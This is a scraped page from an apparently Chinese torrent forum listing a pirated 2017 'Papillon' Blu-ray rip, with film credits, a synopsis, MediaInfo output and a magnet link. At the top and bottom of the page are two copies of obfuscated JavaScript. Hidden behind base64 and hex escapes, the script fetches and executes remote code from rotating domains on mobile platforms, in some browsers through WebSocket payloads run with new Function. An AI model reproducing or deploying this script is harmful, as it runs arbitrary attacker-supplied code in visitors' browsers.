巴比龙[国英多音轨/简体字幕].Papillon.2017.BluRay.1080p.x265.10bit.MNHD 7.98GB

版主小s 24天前 287

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译  名 巴比龙 / 恶魔岛(台) / 逃离恶魔岛
◎片  名 Papillon
◎年  代 2017
◎产  地 美国 / 捷克 / 西班牙
◎类  别 剧情 / 悬疑 / 犯罪
◎语  言 英语 / 西班牙语
◎上映日期 2019-07-26(中国大陆) / 2017-09-07(多伦多电影节) / 2018-08-24(美国)
◎IMDb链接 https://www.imdb.com/title/tt5093026/
◎豆瓣评分 7.4/10 (36947人评价)
◎豆瓣链接 https://movie.douban.com/subject/26636537/
◎片  长 133分钟
◎导  演 迈克尔·诺尔 Michael Noer (id:1328562)
◎编  剧 亚伦·格兹考斯基 Aaron Guzikowski (id:1335435)
       亨利·查理尔 Henri Charrière (id:1041769)
◎演  员 查理·汉纳姆 Charlie Hunnam (id:1000024)
       拉米·马雷克 Rami Malek (id:1044903)
       汤米·弗拉纳根 Tommy Flanagan (id:1081424)
       伊芙·休森 Eve Hewson (id:1236911)
       迈克尔·索恰 Michael Socha (id:1037205)
       伊恩·比蒂 Ian Beattie (id:1348702)
       罗兰·默勒 Roland M?ller (id:1334238)
       约里克·范·韦杰宁根 Yorick van Wageningen (id:1000669)
       乔尔·巴斯曼 Joel Basman (id:1006295)
       瑞沙德·斯垂克 Reshad Strik (id:1009733)
       卡利·内勒 Cali Nelle (id:1346575)
       妮娜·塞尼卡 Nina Senicar (id:1324220)
       尼古拉·肯特 Nikola Kent (id:1384978)
       斯拉夫科·索宾 Slavko Sobin (id:1363502)
       戈兰·纳沃耶克 Goran Navojec (id:1127650)
       马泰·豪曼 Máté Haumann (id:1223421)
       拉姆·伯格曼 Ram Bergman (id:1278446)
       大卫·巴克利 David Buckley (id:1437868)

◎标  签 越狱 / 真实事件改编 / 犯罪 / 监狱 / 传记 / 美国 / 剧情 / 人性

◎简  介
  影片翻拍自1973年史蒂夫·麦奎因与达斯汀·霍夫曼主演的同名经典越狱电影,讲述了查理·汉纳姆饰演的职业扒手亨利被人陷害杀害一名皮条客,从而流放至大海环绕的法属圭亚那的监狱服刑,因为胸前有一处蝴蝶纹身,所以同窗狱友都叫他“巴比龙”。                                    
                                在踏入监狱的那一天开始,巴比龙就策划越狱,但 越狱是需要用金钱去贿赂看守,同时购买逃跑船只的,于是他将目光投向了同时服刑的伪造专家,同时是百万富翁,由拉米·马雷克饰演的Louis,用保证德加安全的方式获得其金钱资助,两人结成同盟……

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 50606838079427074069171702075472730035 (0x261285C190385FAD00C43E7FDAF3D7B3)
  4. Complete name                            : [email protected]
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 7.98 GiB
  8. Duration                                 : 2 h 13 min
  9. Overall bit rate                         : 8 577 kb/s
  10. Encoded date                             : UTC 2021-11-06 14:22:31
  11. Writing application                      : mkvmerge v61.0.0 ('So') 64-bit
  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  13. Video
  14. ID                                       : 1
  15. Format                                   : HEVC
  16. Format/Info                              : High Efficiency Video Coding
  17. Format profile                           : Main [email protected]@Main
  18. Codec ID                                 : V_MPEGH/ISO/HEVC
  19. Duration                                 : 2 h 13 min
  20. Bit rate                                 : 7 550 kb/s
  21. Width                                    : 1 920 pixels
  22. Height                                   : 804 pixels
  23. Display aspect ratio                     : 2.40:1
  24. Frame rate mode                          : Constant
  25. Frame rate                               : 23.976 (24000/1001/53354) FPS
  26. Color space                              : YUV
  27. Chroma subsampling                       : 4:2:0
  28. Bit depth                                : 10 bits
  29. Bits/(Pixel*Frame)                       : 0.204
  30. Stream size                              : 7.03 GiB (88%)
  31. Writing library                          : x265 2.8+1-478bfe2b7673:[Windows][GCC 7.3.0][64 bit] 10bit
  32. Encoding settings                        : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / no-pmode / no-pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x804 / interlace=0 / total-frames=191681 / level-idc=0 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=1 / keyint=360 / gop-lookahead=0 / bframes=8 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=60 / lookahead-slices=4 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / radl=0 / no-intra-refresh / ctu=32 / min-cu-size=8 / rect / no-amp / max-tu-size=16 / tu-inter-depth=2 / tu-intra-depth=2 / limit-tu=4 / rdoq-level=1 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=3 / limit-refs=2 / limit-modes / me=3 / subme=5 / merange=25 / temporal-mvp / weightp / weightb / no-analyze-src-pics / deblock=-1:-1 / no-sao / no-sao-non-deblock / rd=4 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=1 / psy-rd=2.00 / psy-rdoq=5.00 / no-rd-refine / no-lossless / cbqpoffs=-2 / crqpoffs=-2 / rc=crf / crf=19.0 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.90 / cutree / zone-count=0 / no-strict-cbr / qg-size=16 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / max-cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / no-opt-cu-delta-qp / no-aq-motion / no-hdr / no-hdr-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=5 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-mv-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei
  33. Default                                  : Yes
  34. Forced                                   : No
  35. Color range                              : Limited
  36. Color primaries                          : BT.709
  37. Audio #1
  38. ID                                       : 2
  39. Format                                   : AC-3
  40. Format/Info                              : Audio Coding 3
  41. Commercial name                          : Dolby Digital
  42. Codec ID                                 : A_AC3
  43. Duration                                 : 2 h 13 min
  44. Bit rate mode                            : Constant
  45. Bit rate                                 : 640 kb/s
  46. Channel(s)                               : 6 channels
  47. Channel layout                           : L R C LFE Ls Rs
  48. Sampling rate                            : 48.0 kHz
  49. Frame rate                               : 31.250 FPS (1536 SPF)
  50. Compression mode                         : Lossy
  51. Stream size                              : 610 MiB (7%)
  52. Language                                 : English
  53. Service kind                             : Complete Main
  54. Default                                  : Yes
  55. Forced                                   : No
  56. Audio #2
  57. ID                                       : 3
  58. Format                                   : AC-3
  59. Format/Info                              : Audio Coding 3
  60. Commercial name                          : Dolby Digital
  61. Codec ID                                 : A_AC3
  62. Duration                                 : 2 h 13 min
  63. Bit rate mode                            : Constant
  64. Bit rate                                 : 384 kb/s
  65. Channel(s)                               : 2 channels
  66. Channel layout                           : L R
  67. Sampling rate                            : 48.0 kHz
  68. Frame rate                               : 31.250 FPS (1536 SPF)
  69. Compression mode                         : Lossy
  70. Stream size                              : 366 MiB (4%)
  71. Title                                    : Chinese-DD_2.0£cXcY
  72. Language                                 : Chinese
  73. Service kind                             : Complete Main
  74. Default                                  : No
  75. Forced                                   : No
  76. Text #1
  77. ID                                       : 4
  78. Format                                   : ASS
  79. Codec ID                                 : S_TEXT/ASS
  80. Codec ID/Info                            : Advanced Sub Station Alpha
  81. Duration                                 : 2 h 5 min
  82. Bit rate                                 : 138 b/s
  83. Count of elements                        : 957
  84. Compression mode                         : Lossless
  85. Stream size                              : 127 KiB (0%)
  86. Title                                    : 中上英下-ASS_官方字幕£cXcY
  87. Language                                 : Chinese
  88. Default                                  : Yes
  89. Forced                                   : No
  90. Text #2
  91. ID                                       : 5
  92. Format                                   : ASS
  93. Codec ID                                 : S_TEXT/ASS
  94. Codec ID/Info                            : Advanced Sub Station Alpha
  95. Duration                                 : 2 h 5 min
  96. Bit rate                                 : 53 b/s
  97. Count of elements                        : 1138
  98. Compression mode                         : Lossless
  99. Stream size                              : 49.2 KiB (0%)
  100. Title                                    : 简体中文-ASS_CMCT国配字幕£cXcY
  101. Language                                 : Chinese
  102. Default                                  : No
  103. Forced                                   : No
  104. Text #3
  105. ID                                       : 6
  106. Format                                   : ASS
  107. Codec ID                                 : S_TEXT/ASS
  108. Codec ID/Info                            : Advanced Sub Station Alpha
  109. Duration                                 : 2 h 5 min
  110. Bit rate                                 : 54 b/s
  111. Count of elements                        : 987
  112. Compression mode                         : Lossless
  113. Stream size                              : 50.2 KiB (0%)
  114. Title                                    : 简体中文-ASS_R3官方字幕£cXcY
  115. Language                                 : Chinese
  116. Default                                  : No
  117. Forced                                   : No
  118. Text #4
  119. ID                                       : 7
  120. Format                                   : UTF-8
  121. Codec ID                                 : S_TEXT/UTF8
  122. Codec ID/Info                            : UTF-8 Plain Text
  123. Duration                                 : 2 h 5 min
  124. Bit rate                                 : 26 b/s
  125. Count of elements                        : 1138
  126. Stream size                              : 24.5 KiB (0%)
  127. Title                                    : 简体中文-SRT_CMCT国配字幕£cXcY
  128. Language                                 : Chinese
  129. Default                                  : No
  130. Forced                                   : No
  131. Menu
  132. 00:00:00.000                             : 00:00:00.000 / 第 01 章
  133. 00:08:16.621                             : 00:08:16.621
  134. 00:16:47.590                             : 00:16:47.590
  135. 00:21:25.910                             : 00:21:25.910
  136. 00:26:31.965                             : 00:26:31.965
  137. 00:30:39.796                             : 00:30:39.796
  138. 00:34:10.799                             : 00:34:10.799
  139. 00:44:51.147                             : 00:44:51.147
  140. 00:52:54.588                             : 00:52:54.588
  141. 00:59:03.665                             : 00:59:03.665
  142. 01:04:12.891                             : 01:04:12.891
  143. 01:12:18.334                             : 01:12:18.334
  144. 01:20:35.372                             : 01:20:35.372
  145. 01:24:08.418                             : 01:24:08.418
  146. 01:35:19.547                             : 01:35:19.547
  147. 01:40:53.047                             : 01:40:53.047
  148. 01:47:10.883                             : 01:47:10.883
  149. 01:57:03.016                             : 01:57:03.016
  150. 02:02:58.913                             : 02:02:58.913
  151. 02:05:57.550                             : 02:05:57.550
复制代码




TAGS 剧情 悬疑 犯罪

磁力链:
  • magnet:?xt=urn:btih:256378FECCDBA57B786A8B89531AB47417EEBA8B

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};